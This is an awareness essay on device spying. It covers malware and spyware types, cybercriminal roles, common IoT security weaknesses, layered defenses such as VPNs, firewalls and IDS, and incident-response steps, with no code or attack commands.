In today’s world we owe a great deal to technology and the ease of comfort that it grants us. We can perform simple searches that once took a warehouse of machines to compute in mere minutes. We can view far reaching landscapes in full detail without ever having left the comfort of our own home. Everything from finance to fitness are literally at our finger tips daily due in part to these mini super computers we store right in our pockets. Who would have thought the power of something so small who have so much impact on our society? That impact however has not always been positive and in some cases, it has been rather intrusive. In these instances, our devices are sometimes used by nefarious actors whose intent is intrude on own daily lives turning out beloved gadgets into instruments of espionage. Device spying unfortunately is becoming all too common and the damage posed is vast. We must start viewing our devices as we would any other valuable by providing protection. It was once said the best offense is a good defense and we will explore that here. We will discuss the terms, threats and vulnerabilities associated with device spying. We will also discuss methods of device protection and incident response.
To understand device spying we must first know how it finds its way into our devices. The root of this evil can be found with Malware. Malware is designed to cause malicious intent with the purpose to act against the user to affect networks, servers and computers. Malware has been described by many names such as trojan horse, ransomware, adware, scareware and of course spyware. Often the target of malware are corporations, governments and financial institutions. The goal is usually to perform some level of Denial of service attack or DoS attack. The Dos attack’s purpose is to temporarily or indefinitely disrupt services of a host connected the internet. Aside from government agencies and corporation’s malware can be used to target individuals. It can be used to steal personal identifiable information which is any data that can be used to identify a specific person. Examples of PII can include social security numbers, birth dates, place of birth, biometrics, medical records, financial records and your IP address. If stolen by a cyber intruder this could have damaging repercussions.
As part of the malicious bundle malware once installed on your system it can use a few methods to capture your data. One of those methods used to quietly spy on your daily activities is through the use of spyware. The purpose of spyware is capture data without the knowledge or consent of the user. An unauthorized third party can record a user’s text messages, email, camera, conversations, location, passwords, financial data, PII and internet habits. It is installed in varies ways where users can accidently download it or a clever hacker can trick the user to install it. Another method of installation is known as “drive by downloading” where the user visits an infected website. These infected websites require no action by the user but the download starts soon after visiting the site. There are also commercial versions of spyware installed with the purpose to monitor corporate devices. Users should also be aware that there are several types of spyware that exist. These include adware, rootkits, keyloggers, trojans, tracking cookies, digital rights management, system monitors, web beacons. One to note is key logging which can capture your keystrokes and send information back to hackers giving them unauthorized access. Spyware has also been known to redirect you to suspicious websites where further data breaches can take place. The dangers do not stop there, spyware is also known to affect browser, software, and computer settings by making unauthorized changes that impact the user.
You may now wonder who are these individuals operating in the darkest places of the web preying your devices. These individuals are cyber criminals and they pose a great threat to sovereign governments, corporations and individual users alike. The severity of these threats posed by these cyber criminals has reached center stage at the highest levels of the U.S. intelligence community. The U.S. Director of National Intelligence Dan Coats said “The potential for surprise in the cyber realm will increase in the next year and beyond as billions more digital devices are connected with relatively little built in security and both nation states and malign actors become more embolden and better equipped in the use of increasingly widespread cyber toolkits.” These nation states and malign actors better known as cybercriminals tend to operate in varies roles and in varies organizations such as:
• Leaders: Typically, are not tech savvy however they lead cybercriminals.
• Programmers: Create lines of code or programs that cybercriminals use.
• Hackers: Unauthorized users who attempt to gain access to networks.
• Fraudsters: Create spam and phishing.
• System hosts and providers: Host sites and servers that possess illegal contents.
• IT experts: Maintain a cybercriminal organization’s IT infrastructure, such as servers, encryption technologies and databases.
• Money mules: Control and manage wired bank transfers.
• Distributors: Sell stolen data on the black market that is acquired from cybercriminals.
• Cashiers: Provide account names to cybercriminals and control drop accounts.
• Tellers: Transfer and launder illegal money via digital and foreign exchange methods.
The list above is only a glimpse into the complex world of cybercrime. In some cases, these cyber thugs are sponsored by nation states. Nation states sponsor cyber criminals to perform more complex attacks typically against other governments but have been known to target corporations. Examples of state sponsored cyber-attacks are as follows; state sponsored cyber-attacks against Ukraine and Saudi Arabia targeted commercial networks, government institutions and critical infrastructure. North Korea a well-known perpetrator of state sponsored cyberattacks has an active botnet in place to perform DDoS attacks. US shipping lanes have also been affected by a global spread of malware. As you can see cyber criminals have a reach that can span the global.
As mentioned before nation states pose a great threat and our house hold devices offer them a gateway into our lives. Former US Director of National Intelligence James Clapper in statement to congress regarding threats to the US said, “In the future, intelligence services might use the internet of things for identification, surveillance, monitoring, location tracking, and targeting for recruitment, or to gain access to networks or user credentials.” The “internet of things” (IOT) generally includes smart devices and devices that include RFID (Radio-frequency identification) chips found in kitchen appliances and thermostats that are connected to the internet. Hackers have been known to use these devices as gateways into networks. This statement from the former director of national intelligence should be alarming because it is a direct warning of things to come. Now let’s explore the threats, risks and vulnerabilities associated with device spying and how it affects IOT devices.
To further understand the potential negative impact of IOT device spying we must be familiar with the terms threat, risk and vulnerability. Threats are a circumstance or event that can compromise the confidentiality, integrity or availability of data or a system. Risk however is the likelihood that a threat will exploit vulnerability. Vulnerability in this instance is considered a flaw or weakness in software, hardware or process that could result in a security breach. There are many different threats, risks and vulnerabilities associated with targeting IOT devices for spying. Below we will explore ten key points that have been noted as having negative impact on users.
Insecure Web Interfaces
One of the first threats is insecure web interfaces that are built into the devices. These interfaces unlike their more robust laptop or desktop cousins could allow attackers to gain unauthorized access. Vulnerabilities associated with this can range from account enumeration, SQL-inject, weak default credentials, cross site scripting and weak account lockout settings.
Another threat posed is insufficient authentication/authorization which commonly deals with ineffective methods that fail to authenticate the device user via the interface. This allows the person accessing the device to have a higher level of access than what should be allowed. Vulnerabilities associated with this threat include poorly protected credentials, insecure password recovery, privilege escalation, lack of role-based access control and lack of password complexity.
Insecure Network Services
This threat is related to access points that are used to gain access to the IOT devices. Here hackers can could gain unauthorized access to and exploit sensitive data. The main vulnerabilities here could result in attacks such as buffer overflow, DoS (denial of service) or DoS via Network device fuzzing.
Lack of Transport Encryption
A lack of encryption during the exchange of data with the IOT device could provide a gateway for a hacker to sniff data. This practice of data sniffing (packet sniffing) or data capture can be used by a hacker to compromise the IOT device. Vulnerabilities that could cause this threat are misconfigured SSL/TLS, poorly implemented SSL/TLS, unencrypted services via the internet and local network.
Invasion of privacy
This is the cause of concerns related to the capturing of personal data (PII) and the lack of protection to secure the information. As mentioned before the stealing of PII or any sensitive data can be damaging. The threat of ID theft and fraud can be attributed to privacy invasion in the event of device spying. Fortunately, this can be detected by reviewing what data is being captured as the user operates the device. There are also automated toolkits that can detect patterns that indicate if the user’s PII is being collected. Vulnerabilities that could lead to this concern are mainly the unauthorized collection of PII, lack of awareness in how to protect PII and poorly secured data.
Insecure Cloud Interface
This implies that the cloud interface used to interact with the IOT device has a poor authentication control. The data is traveling via unencrypted means which give the cybercriminal an opportunity to access the device or data. Specific vulnerabilities that have cause this threat are not having an account lockout in place, exposed credentials on the network, and account enumeration.
Insecure mobile Interface
This point is like insecure cloud interface also deals with weak authentication, or unencrypted data that can be exploited by the hackers due to unsecure access points. Once again unsecure IOT device interfaces can leave you vulnerable. Issues that could lead this are like that of insecure cloud interfaces.
Insufficient Security Configurability
Users who have a limited access to security controls experience Insufficient Security Configurability. Typically, this is found when the web interface of the device has no options for creating permissions. The result here is that IOT device may be susceptible to attack allowing unauthorized access. Associated vulnerabilities that can cause this problem are not having a security login, no security monitoring, a lack of password options and a lack of granular permissions model.
Updating your systems is also a major key in your defense from outside threats. Not having the ability for a device to update could be the greatness flaw in your network security. All devices should have the ability to update to when vulnerabilities are found. It is important to remember that software and firmware updates can be insecure if the network connection is not protected. It is also important to note that software and firmware can contain hardcoded sensitive data such credentials. This hardcoding of sensitive data can be exploited and can remain vulnerable. It is important to remember that if any devices on your network do not have the ability to update it will remain vulnerable. Security vulnerabilities that can cause this include lack of encrypted file updates, no update functionality, updates not being verified prior to update and encryption not being used to fetch updates.
Poor physical Security
It goes without saving but users must protect their IOT devices be it at home or in public. Having weak physical security can also give a cybercriminal access to your IOT devices. If the cybercriminal gains access to your device and can disassemble it this could give them access to the devices storage or any other data. USB/external ports also are included as the use of a USB could lead to malicious configuration. The security vulnerabilities that can cause this and they include; accessing software via a USB port, unauthorized removal of a storage drive.
After exploring just, a small array of the associated threats, risks and vulnerabilities with IOT devices the question becomes how can we defend ourselves from these threats. At the bare minimum just having a basic awareness is enough to start the process in boosting our defense. However, awareness alone will not properly protect our networks and devices. Instead we should look at a concept called depth in defense which refers to layered security. This level of layered security typically involves the deployment of VPN (encryption tunnel), Firewalls, IDS and to protect a network.
A virtual private network (VPN) can help protect your network via the use of encryption. Your connection with your VPN’s server uses encryption technologies, such as IP security (IPSec), Layer 2 Tunneling Protocol (L2TP) IPSec, Secure Sockets Layer (SSL) and Transport Layer Security (TLS) to create an encrypted tunnel between your device and the VPN server. VPNs also remove your internet service provider (ISP) out of the loop on your browsing habits because they only see numerous logs of you connecting to the VPN server. Typically, when you browse the internet through this secure network it becomes more difficult for anyone to eavesdrop.
A firewall is a software program and or piece of hardware that blocks intruders from entering and using your network/computer. The primary purpose of a firewall is to determine whether requests issued by one computing device to initiate a connection with another device should be permitted or not based upon rules configured by the firewall’s administrator. A firewall blocks communication to and from sources you don’t permit. There are two types of firewalls software-based personal firewalls and network based. Software based typically are extensions of the workstation’s operating system, and network-based firewalls that are hardware appliances that physically pass traffic using the same innerworkings as network routers and switches.
An Intrusion Detection System (IDS) is a network security technology was created with the sole purpose of detecting vulnerability related to an application or computer. Intrusion Detection Systems are passive systems that try to detect attacks as they occur. It collects network traffic information from the network or computer system and then use this information to secure the network. Intrusion detection systems are considered to be either anomaly detection or misuse-detection based. Misuse-detection based IDSs can only detect known attacks where anomaly detection based can also detect new attacks by using heuristic methods. The IDS only needs to passively detect threats and due to this it is placed outside of the network or as it is called (out-of-band on the network infrastructure). Meaning its not does not perform any real time communications between the sender and receiver of data. Ultimately the IDS only monitors traffic and sends reports on that traffic to an administrator. It should also be noted that IDS can’t act alone to prevent a detected breach. It however requires vigilance from the administrator to provide constant vigilance. Cyber criminals have been known to exploit IDS vulnerabilities once inside a network. Typically, the intruder would turn the IDS off to prevent the device from performing its passive detection duties.
To further understand how to implement layered security we will need know what types of methods they will use. At this point we can start to create security apparatus to defend against intrusion. Most hackers do a lot of intelligence gathering after they have decided on their target. Of course, the easiest way to get the information is a tap, but let’s say they cannot get to that type of easy access. By routing through the internet, hackers can get emails off company sites, people’s signature lines, posing as perspective allies, etc. By using a firewall and IDS, this limits internal access via filtering. Most people use the factory settings and accept updates. While the more informed go to websites that give more information of what people are using to exploit systems and hardware. So, to go a step further, when people work from home and need to access files at work, they use VPN’s. VPN’s allow for a secure tunnel between your home and work. This secure tunnel allows for all information traversing through the tunnel to be encrypted. (To the right is a diagram illustrating layered security for a network.) There are different types of encryption that are a lot harder to crack. With all these powers combined, you have a basic secure network.
Finally, in the event of a cyber-attack or data breach knowing how to respond to the incident is critical. Today many companies have adopted some form of incident response (IR) that is a list of procedures detailing how to properly respond in the event of a known cyber intrusion. Many of these plans involve alerting a computer security incident response team (CSIRT) who are usually general IT, legal, human resources and public relation staff. The team and plan can vary in its approach however the goal is the same which is prevent further loss. Below we will explore what the execution of a cyber incident response in the event IOT device is compromised.
In the event of a device spying scenario where the IOT device has been comprised several procedures should be enacted to prevent any further loss or potential damage to other systems. The first steps to executing an incident response is validating the data breach. It is critical to verify that the incident by reviewing all information. Typically, a review of logs will confirm what if any sensitive information has been breached. Next carefully manage the evidence and document everything related to the investigation. Any staff who is interviewed or materials gathers needs to be handled with extreme care to further help the mitigation efforts. It may be best to seek the assistance of legal counsel for approved methods to protect the handling of digital evidence. Assemble your computer security incident response team (CSIRT) to begin the process of investigating the incident. The response team will continue to monitor the incident and provide status updates. Consulting with the team to determine the full scope of damages may result in a request for outside assistance such as law enforcement. In the event additional resources are needed it is recommended to get approval from senior leadership and legal. Next is to identify and secure all data, machines, systems and devices that have been compromised to mitigate the impact. At this stage it is critical to reduce the impact and to prevent and further damages. To do so an immediate change of all passwords and encryption keys will need to be performed. Additionally, a scrubbing of the network will need to be performed to remove any malicious code. Next steps are to inform all owners of critical and sensitive data that there has been a breach. Senior leadership, legal and public relations team should draft a statement of notification to clearly state the issue and the impact of the breach. Also, at this time any individuals who have been directly impacted by the breach should be notified immediately with a timeframe that meets federal, state and local laws. Finally, conduct sessions where lessons learned are addressed to further develop improvements. During this time all teams should meet to discuss how to prevent a future intrusion and reflect on events that lead this initial breach.
In conclusion today, we face an ever-growing array of these threats be it from lone hackers or foreign powers. Despite these cyber-attacks as severe as these threats may be the best weapon against these threats is awareness. If the common user is more aware of what the potential dangers their mundane IOT devices this will reduce further incidents. In the days ahead, preparation will be key to ensuring that cyber criminals do not prey on our sensitive information. As it was once said “best offense is a good defense”.